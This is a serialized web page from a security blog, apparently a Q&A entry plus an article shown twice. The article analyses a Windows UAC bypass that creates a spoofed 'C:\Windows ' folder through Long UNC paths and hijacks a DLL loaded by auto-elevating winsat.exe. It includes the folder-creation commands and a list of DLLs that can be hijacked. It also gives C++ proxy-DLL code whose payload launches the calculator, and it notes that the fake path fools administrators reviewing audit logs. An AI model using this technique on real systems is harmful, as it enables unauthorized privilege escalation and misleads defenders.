[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fARbRA-9zEfQlAO_ex3OgXFUKqd1U2T-SRgL_1OSavK8":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},623,"What are some limitations or variations of the Long UNC folder creation for UAC bypass?","The fake folder can be created with multiple spaces (e.g., `\\\\?\\C:\\Windows  `) or using at least two periods (e.g., `\\\\?\\C:\\Windows..`), but only the space variation works for UAC bypass. Additionally, short filenames (8.3 format) cannot be used to reference the fake path. The technique exploits path confusion to deceive administrators during process auditing, as the folder name appears identical to the legitimate `Windows` directory. Further variations are explored in [Expansion of Techniques for Exploiting Simulated Trusted Directories](\u002Fnews\u002Fexpansion-of-techniques-for-exploiting-simulated-trusted-directories).","\u003Cp>The fake folder can be created with multiple spaces (e.g., `\\\\?\\C:\\Windows  `) or using at least two periods (e.g., `\\\\?\\C:\\Windows..`), but only the space variation works for UAC bypass. Additionally, short filenames (8.3 format) cannot be used to reference the fake path. The technique exploits path confusion to deceive administrators during process auditing, as the folder name appears identical to the legitimate `Windows` directory. Further variations are explored in [Expansion of Techniques for Exploiting Simulated Trusted Directories](\u002Fnews\u002Fexpansion-of-techniques-for-exploiting-simulated-trusted-directories).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fanalysis-of-uac-bypass-exploitation-by-mocking-trusted-directories\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-some-limitations-or-variations-of-the-long-unc-folder-creation-for-uac--1777482502902","Long UNC variations, spaces, dots, short filename, process auditing",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},153,"Analysis of UAC Bypass Exploitation by Mocking Trusted Directories","analysis-of-uac-bypass-exploitation-by-mocking-trusted-directories","Learn how to bypass UAC by mocking trusted directories using Long UNC and DLL hijacking. Exploit analysis with winsat.exe and payload implementation.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A technique learned from @CE2Wells' blog: bypassing UAC by mocking trusted directories. This article will introduce this method based on personal experience, add my own insights, and share details from testing.\u003C\u002Fp>\u003Cp>Article link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmedium.com\u002Ftenable-techblog\u002Fuac-bypass-by-mocking-trusted-directories-24a96675f6e\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Principle Overview\u003C\u002Fli>\u003Cli>Implementation Details\u003C\u002Fli>\u003Cli>Practical Testing\u003C\u002Fli>\u003Cli>Exploitation Analysis\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Principle Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Long UNC\u003C\u002Fh3>\u003Cp>In a previous article titled 'Catalog Signature Forgery – Long UNC Filename Spoofing', it was mentioned that using Long UNC for exe files can deceive the system into recognizing it as another file.\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>type putty.exe &gt; \"\\\\?\\C:\\Windows\\System32\\calc.exe \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017311822_0_db3ac88cf0.jpeg\">\u003C\u002Fp>\u003Cp>This method also applies to folders.\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The newly created folder can deceive the system into recognizing it as another folder.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017348018_1_897923f2b9.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017385947_2_184f78f5d6.jpeg\">\u003C\u002Fp>\u003Ch3>2. Files that can bypass UAC by default\u003C\u002Fh3>\u003Cp>Must meet the following three conditions:\u003C\u002Fp>\u003Cul>\u003Cli>The program is configured to automatically elevate privileges and execute with administrator permissions.\u003C\u002Fli>\u003Cli>Program contains signature\u003C\u002Fli>\u003Cli>Executed from trusted directory (\"c:\\windows\\system32\")\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>3. Regular user permissions can create folders in disk root directory\u003C\u002Fh3>\u003Cp>For example, regular user permissions can create folders under C drive\u003C\u002Fp>\u003Ch3>4. DLL hijacking\u003C\u002Fh3>\u003Cp>If an exe program needs to load DLLs during startup, it first searches the same directory as the exe by default\u003C\u002Fp>\u003Cp>In summary, all conditions for bypassing UAC are met\u003C\u002Fp>\u003Cp>Implementation approach is as follows:\u003C\u002Fp>\u003Col>\u003Cli>Find a file that can bypass UAC by default, such as c:\\windows\\system32\\winsat.exe\u003C\u002Fli>\u003Cli>Use Long UNC to create a special folder \"c:\\windows \\\" and copy winsat.exe to this directory\u003C\u002Fli>\u003Cli>Execute winsat.exe, record the startup process, and discover it needs to load WINMM.dll from the same directory during startup\u003C\u002Fli>\u003Cli>Write payload.dll, specify export functions identical to c:\\windows\\system32\\winmm.dll, and name it \"c:\\windows \\system32\\WINMM.dll\"\u003C\u002Fli>\u003Cli>Execute \"c:\\windows \\system32\\winsat.exe\", which will automatically bypass UAC, load \"c:\\windows \\system32\\WINMM.dll\", and execute the payload\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x03 Implementation Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Find exploitable exe files\u003C\u002Fh3>\u003Cp>One characteristic of these files is that the autoElevate attribute in the manifest is true\u003C\u002Fp>\u003Cp>Automated search can be achieved using PowerShell, reference tool:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fg3rzi\u002FManifesto\u003C\u002Fp>\u003Cp>The GUI tool usage is shown in the following image\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017410440_3_37fb366c50.jpeg\">\u003C\u002Fp>\u003Ch3>2. Use Long UNC to create a special folder \"c:\\windows \\\"\u003C\u002Fh3>\u003Cp>C++ implementation code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>CreateDirectoryW(L\"\\\\\\\\?\\\\C:\\\\Windows \\\\\", 0);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command implemented via command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Record the startup process of winsat.exe, looking for dlls loaded during startup\u003C\u002Fh3>\u003Cp>Here you can use Process Monitor, filter for records with result \"NAME NOT FOUND\" during startup, as shown in the following image\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017459487_4_ee456e757b.jpeg\">\u003C\u002Fp>\u003Cp>Therefore, the exploitable dll names are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>VERSION.dll\u003C\u002Fli>\u003Cli>WINMM.dll\u003C\u002Fli>\u003Cli>POWRPROF.dll\u003C\u002Fli>\u003Cli>dxgi.dll\u003C\u002Fli>\u003Cli>dwmapi.dll\u003C\u002Fli>\u003Cli>d3d10_1.dll\u003C\u002Fli>\u003Cli>d3d11core.dll\u003C\u002Fli>\u003Cli>d3d11.dll\u003C\u002Fli>\u003Cli>d3d10core.dll\u003C\u002Fli>\u003Cli>QUARTZ.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Choose any one\u003C\u002Fp>\u003Ch3>4. Write payload.dll, specify export functions\u003C\u002Fh3>\u003Cp>exportstoc can be used here, download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fmichaellandi\u002Fexportstoc\u003C\u002Fp>\u003Cp>For detailed usage instructions, refer to the previous article \"Study Notes Weekly No.1(Monitor WMI &amp; ExportsToC++ &amp; Use DiskCleanup bypass UAC)\"\u003C\u002Fp>\u003Cp>For example, here we select VERSION.dll, the original DLL path to hijack is c:\\\\Windows\\\\system32\\\\version.dll, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017475968_5_bdf48a2977.jpeg\">\u003C\u002Fp>\u003Cp>Add payload to launch calculator, the final code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \"stdafx.h\"\u003Cbr>#include \u003Ciostream>\u003Cbr>#include \u003Cwindows.h>\u003Cbr>\u003Cbr>using namespace std;\u003Cbr>\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoA=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoA,@1\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoByHandle=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoByHandle,@2\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoExW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoExW,@3\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeA=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeA,@4\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeExW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeExW,@5\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeW,@6\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoW,@7\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerFindFileA=c:\\\\windows\\\\system32\\\\version.VerFindFileA,@8\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerFindFileW=c:\\\\windows\\\\system32\\\\version.VerFindFileW,@9\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerInstallFileA=c:\\\\windows\\\\system32\\\\version.VerInstallFileA,@10\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerInstallFileW=c:\\\\windows\\\\system32\\\\version.VerInstallFileW,@11\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerLanguageNameA=c:\\\\windows\\\\system32\\\\version.VerLanguageNameA,@12\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerLanguageNameW=c:\\\\windows\\\\system32\\\\version.VerLanguageNameW,@13\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerQueryValueA=c:\\\\windows\\\\system32\\\\version.VerQueryValueA,@14\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerQueryValueW=c:\\\\windows\\\\system32\\\\version.VerQueryValueW,@15\")\u003Cbr>\u003Cbr>BOOL WINAPI DllMain(HINSTANCE hInst,DWORD reason,LPVOID)\u003Cbr>{\u003Cbr>\tsystem(\"start calc.exe\");\u003Cbr>\treturn true;\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fiostream>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile it into a DLL and save it as \"c:\\windows\\system32\\VERSION.dll\".\u003C\u002Fp>\u003Ch3>5. Launch the executable\u003C\u002Fh3>\u003Cp>To launch from the command line, use the absolute path: \"c:\\windows\\system32\\winsat.exe\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Short filenames (obtained via \"dir \u002Fx\") cannot be used here\u003C\u002Fp>\u003Ch2>0x04 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Multiple exploitable locations exist\u003C\u002Fp>\u003Cp>In my test system (Win7 x64), there are 39 exploitable exe files, and many exploitable dll files as well\u003C\u002Fp>\u003Cp>2. There are other forms for Long UNC folders\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Cul>\u003Cli>Filenames can contain multiple spaces: \"\\\\?\\C:\\Windows    \"\u003C\u002Fli>\u003Cli>Using the character \".\" (at least two): \"\\\\?\\C:\\Windows..\"\u003C\u002Fli>\u003C\u002Ful>\u003Cp>However, other forms of folders cannot be used to bypass UAC\u003C\u002Fp>\u003Cp>3. Creating forged folders using Long UNC can deceive \"careless administrators\"\u003C\u002Fp>\u003Cp>For example, if the system has Windows command line process auditing enabled, recording program execution parameters\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017486520_6_5c05e11e6d.jpeg\">\u003C\u002Fp>\u003Cp>It is difficult to distinguish with the naked eye\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article analyzes the method of bypassing UAC by simulating trusted directories and shares details from the testing process\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A technique learned from @CE2Wells' blog: bypassing UAC by mocking trusted directories. This article will introduce this method based on personal experience, add my own insights, and share details from testing.\u003C\u002Fp>\u003Cp>Article link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmedium.com\u002Ftenable-techblog\u002Fuac-bypass-by-mocking-trusted-directories-24a96675f6e\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Principle Overview\u003C\u002Fli>\u003Cli>Implementation Details\u003C\u002Fli>\u003Cli>Practical Testing\u003C\u002Fli>\u003Cli>Exploitation Analysis\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Principle Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Long UNC\u003C\u002Fh3>\u003Cp>In a previous article titled 'Catalog Signature Forgery – Long UNC Filename Spoofing', it was mentioned that using Long UNC for exe files can deceive the system into recognizing it as another file.\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>type putty.exe &gt; \"\\\\?\\C:\\Windows\\System32\\calc.exe \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017311822_0_db3ac88cf0-1.jpeg\">\u003C\u002Fp>\u003Cp>This method also applies to folders.\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The newly created folder can deceive the system into recognizing it as another folder.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017348018_1_897923f2b9-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017385947_2_184f78f5d6-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Files that can bypass UAC by default\u003C\u002Fh3>\u003Cp>Must meet the following three conditions:\u003C\u002Fp>\u003Cul>\u003Cli>The program is configured to automatically elevate privileges and execute with administrator permissions.\u003C\u002Fli>\u003Cli>Program contains signature\u003C\u002Fli>\u003Cli>Executed from trusted directory (\"c:\\windows\\system32\")\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>3. Regular user permissions can create folders in disk root directory\u003C\u002Fh3>\u003Cp>For example, regular user permissions can create folders under C drive\u003C\u002Fp>\u003Ch3>4. DLL hijacking\u003C\u002Fh3>\u003Cp>If an exe program needs to load DLLs during startup, it first searches the same directory as the exe by default\u003C\u002Fp>\u003Cp>In summary, all conditions for bypassing UAC are met\u003C\u002Fp>\u003Cp>Implementation approach is as follows:\u003C\u002Fp>\u003Col>\u003Cli>Find a file that can bypass UAC by default, such as c:\\windows\\system32\\winsat.exe\u003C\u002Fli>\u003Cli>Use Long UNC to create a special folder \"c:\\windows \\\" and copy winsat.exe to this directory\u003C\u002Fli>\u003Cli>Execute winsat.exe, record the startup process, and discover it needs to load WINMM.dll from the same directory during startup\u003C\u002Fli>\u003Cli>Write payload.dll, specify export functions identical to c:\\windows\\system32\\winmm.dll, and name it \"c:\\windows \\system32\\WINMM.dll\"\u003C\u002Fli>\u003Cli>Execute \"c:\\windows \\system32\\winsat.exe\", which will automatically bypass UAC, load \"c:\\windows \\system32\\WINMM.dll\", and execute the payload\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x03 Implementation Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Find exploitable exe files\u003C\u002Fh3>\u003Cp>One characteristic of these files is that the autoElevate attribute in the manifest is true\u003C\u002Fp>\u003Cp>Automated search can be achieved using PowerShell, reference tool:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fg3rzi\u002FManifesto\u003C\u002Fp>\u003Cp>The GUI tool usage is shown in the following image\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017410440_3_37fb366c50-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Use Long UNC to create a special folder \"c:\\windows \\\"\u003C\u002Fh3>\u003Cp>C++ implementation code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>CreateDirectoryW(L\"\\\\\\\\?\\\\C:\\\\Windows \\\\\", 0);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command implemented via command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Record the startup process of winsat.exe, looking for dlls loaded during startup\u003C\u002Fh3>\u003Cp>Here you can use Process Monitor, filter for records with result \"NAME NOT FOUND\" during startup, as shown in the following image\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017459487_4_ee456e757b-1.jpeg\">\u003C\u002Fp>\u003Cp>Therefore, the exploitable dll names are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>VERSION.dll\u003C\u002Fli>\u003Cli>WINMM.dll\u003C\u002Fli>\u003Cli>POWRPROF.dll\u003C\u002Fli>\u003Cli>dxgi.dll\u003C\u002Fli>\u003Cli>dwmapi.dll\u003C\u002Fli>\u003Cli>d3d10_1.dll\u003C\u002Fli>\u003Cli>d3d11core.dll\u003C\u002Fli>\u003Cli>d3d11.dll\u003C\u002Fli>\u003Cli>d3d10core.dll\u003C\u002Fli>\u003Cli>QUARTZ.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Choose any one\u003C\u002Fp>\u003Ch3>4. Write payload.dll, specify export functions\u003C\u002Fh3>\u003Cp>exportstoc can be used here, download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fmichaellandi\u002Fexportstoc\u003C\u002Fp>\u003Cp>For detailed usage instructions, refer to the previous article \"Study Notes Weekly No.1(Monitor WMI &amp; ExportsToC++ &amp; Use DiskCleanup bypass UAC)\"\u003C\u002Fp>\u003Cp>For example, here we select VERSION.dll, the original DLL path to hijack is c:\\\\Windows\\\\system32\\\\version.dll, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017475968_5_bdf48a2977-1.jpeg\">\u003C\u002Fp>\u003Cp>Add payload to launch calculator, the final code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \"stdafx.h\"\u003Cbr>#include \u003Ciostream>\u003Cbr>#include \u003Cwindows.h>\u003Cbr>\u003Cbr>using namespace std;\u003Cbr>\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoA=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoA,@1\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoByHandle=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoByHandle,@2\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoExW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoExW,@3\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeA=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeA,@4\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeExW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeExW,@5\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeW,@6\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoW,@7\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerFindFileA=c:\\\\windows\\\\system32\\\\version.VerFindFileA,@8\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerFindFileW=c:\\\\windows\\\\system32\\\\version.VerFindFileW,@9\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerInstallFileA=c:\\\\windows\\\\system32\\\\version.VerInstallFileA,@10\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerInstallFileW=c:\\\\windows\\\\system32\\\\version.VerInstallFileW,@11\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerLanguageNameA=c:\\\\windows\\\\system32\\\\version.VerLanguageNameA,@12\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerLanguageNameW=c:\\\\windows\\\\system32\\\\version.VerLanguageNameW,@13\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerQueryValueA=c:\\\\windows\\\\system32\\\\version.VerQueryValueA,@14\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerQueryValueW=c:\\\\windows\\\\system32\\\\version.VerQueryValueW,@15\")\u003Cbr>\u003Cbr>BOOL WINAPI DllMain(HINSTANCE hInst,DWORD reason,LPVOID)\u003Cbr>{\u003Cbr>\tsystem(\"start calc.exe\");\u003Cbr>\treturn true;\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fiostream>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile it into a DLL and save it as \"c:\\windows\\system32\\VERSION.dll\".\u003C\u002Fp>\u003Ch3>5. Launch the executable\u003C\u002Fh3>\u003Cp>To launch from the command line, use the absolute path: \"c:\\windows\\system32\\winsat.exe\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Short filenames (obtained via \"dir \u002Fx\") cannot be used here\u003C\u002Fp>\u003Ch2>0x04 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Multiple exploitable locations exist\u003C\u002Fp>\u003Cp>In my test system (Win7 x64), there are 39 exploitable exe files, and many exploitable dll files as well\u003C\u002Fp>\u003Cp>2. There are other forms for Long UNC folders\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Cul>\u003Cli>Filenames can contain multiple spaces: \"\\\\?\\C:\\Windows    \"\u003C\u002Fli>\u003Cli>Using the character \".\" (at least two): \"\\\\?\\C:\\Windows..\"\u003C\u002Fli>\u003C\u002Ful>\u003Cp>However, other forms of folders cannot be used to bypass UAC\u003C\u002Fp>\u003Cp>3. Creating forged folders using Long UNC can deceive \"careless administrators\"\u003C\u002Fp>\u003Cp>For example, if the system has Windows command line process auditing enabled, recording program execution parameters\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017486520_6_5c05e11e6d-1.jpeg\">\u003C\u002Fp>\u003Cp>It is difficult to distinguish with the naked eye\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article analyzes the method of bypassing UAC by simulating trusted directories and shares details from the testing process\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",899,"Onedaysec",4,"published","2026-02-02T07:38:21.454Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"UAC Bypass via Mocking Trusted Directories: Exploitation Analysis","UAC bypass, mocking trusted directories, Long UNC, DLL hijacking, Windows security, privilege escalation, winsat.exe, exploit analysis",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46,47],622,621,620,619,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.321Z","2026-07-23T16:01:50.957Z","draft","2026-07-23T16:13:49.982Z"]